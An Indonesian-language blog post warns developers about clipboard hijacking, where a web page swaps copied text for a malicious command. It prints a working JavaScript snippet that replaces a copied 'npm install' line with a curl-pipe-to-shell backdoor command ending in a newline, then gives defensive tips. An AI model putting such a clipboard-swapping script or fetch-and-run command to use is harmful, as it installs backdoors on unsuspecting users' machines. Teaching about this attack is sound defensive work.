Bahaya Copy & Paste (Copas)
Pasti teman-teman developer pernah menyalin sebaris perintah/command dari suatu website. Kita akan berasumsi bahwa text yang kita salin itu merupakan text yang benar, Ya/tidak! bagaimana jika text yang kita salin di ganti dengan suatu perintah/command yang dapat merugikan kita / kode berbahaya?. yang di perlukan peretas hanyalah sebaris perintah saja yang berfungsi untuk memasukkan backdoor atau virus agar peretas dapat mengendalikan perangkat kamu dari kejauhan. Serangan ini sangat sederhana tapi cukup ampuh. Berikut penjelasan lebih lanjut dan cara kerjanya.
Di atas merupakan simulasi ketika kita ingin menyalin dan langsung menjalankannya pada terminal, contoh sederhananya lagi ketika kita hendak menginstall suatu package menggunakan npm dan kamu menemukan perintah/command untuk menginstall pada suatu web, tanpa pikir panjang kebanyakan kita langsung menyalin dan paste text tersebut ke terminal. Codepen Copy&Paste.
PROBLEM: Satu lagi masalahnya disini peretas langsung melakukan enter dengan code (\n) setelah baris perintah berbahaya, jadi perintah yang di salin langsung otomatis terjalankan.
Contoh Script yang digunakan:
<p id="copy">npm install package</p>
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://localhost/backdoor.sh | sh\n'); e.preventDefault(); });
</script>
Bagaimana menghindarinya?
- Pastikan Website yang kita kunjungi terpercaya dan sudah terjamin, contohnya ketika ingin mencari dokumentasi atau package langsung kesitus resminya.
- Untuk Berjaga-jaga , jangan langsung paste text yang sudah di copy ke terminal , cobalah untuk paste ke notepad atau text editor lainnya.
- Intinya jangan langsung menempelkan text ke terminal.
# Pesan Penulis
Selalu hati-hati dan waspada , karena kita tidak tau kejahatan apa yang akan kita hadapi nantinya.
Cukup itu yang dapat saya berikan, semoga bermanfaat. Terimakasih 😁